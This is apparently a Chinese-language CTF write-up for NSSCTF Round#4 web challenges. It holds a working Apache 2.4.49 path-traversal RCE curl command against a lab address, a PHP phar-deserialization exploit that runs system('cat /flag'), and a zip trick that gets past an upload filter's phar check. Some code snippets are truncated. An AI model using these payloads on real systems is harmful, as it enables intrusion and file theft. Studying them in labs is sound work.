NSSCTF Round#4

1zweb

 打开界面感觉这道题和上一个一样，有查询文件的功能，直接查询flag，签到提

ez_rce

打开界面各种看，源码啥都没有

然后抓包看一下配置， 

搜一下有，2.4.49有目录遍及的漏洞，和以前做的一道题几乎一样

远程代码执行

curl -v --data "echo;id" 'http://192.168.190.134:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'  

看见flag_is_here,以为就要成功了，可是怎么都得不到 

 

内心想的是是不是故意给出flag的文件，然后真的却不在这里面呢 

步骤没错，可是缺乏考虑，wp中说，这里制造了一个文件夹迷宫，仅存在四层

需要bp爆破，因为没环境不好构造，给出链接

NSSCTF

1zweb(revenge)

 额看到查询文件，就查一下源码

ljt="ljt"; 
$this->dky="dky"; phpinfo(); } 
public function __destruct()
          { if($this->ljt==="Misc"&&$this->dky==="Re") eval($this->cmd); } 
public function __wakeup(){ $this->ljt="Re"; $this->dky="Misc"; } }
 $file=$_POST['file']; if(isset($_POST['file']))
         { if (preg_match("/flag/i", $file)) { die("nonono"); } 

echo file_get_contents($file); } 

感觉不太完整，也没反序列化，脑子里第一想的会不会是构建一个phar包，自动实现序列化这种

以上都是自己的分析，看完wp

ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    if (preg_match("/flag/i", $file)) {
      die("nonono");
    }
    echo file_get_contents($file);
}

为什么我的不是完整的呢，可能在源码完整。

   if($this->ljt==="Misc"&&$this->dky==="Re")这样那肯定，就是

lit=Misc dky=Re

  public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }这里面构建就会出现，而反序列化会在后面赋值覆盖掉

  public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }这里冲突，应该会绕过wakeup，大于属性个数，

这样看就是构造phar包

cmd="system('cat /flag');";
  $a->ljt="Misc";
  $a->dky="Re";
  $phar = new Phar('phar.phar');
  $phar->setStub('GIF89a'.'');
  $phar->setMetadata($a);
  $phar->addFromString('1.txt','dky');
?>

然后phar访问

 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }
}
?>

后缀必须是图片，且内容不能出现phar标志

可以压缩zip绕过

  $phar = new Phar('phar.phar');来判断文件的名称 

上传后用phar伪协议读取，格式phar://文件上传的路径.phar.phar               自己设置的名称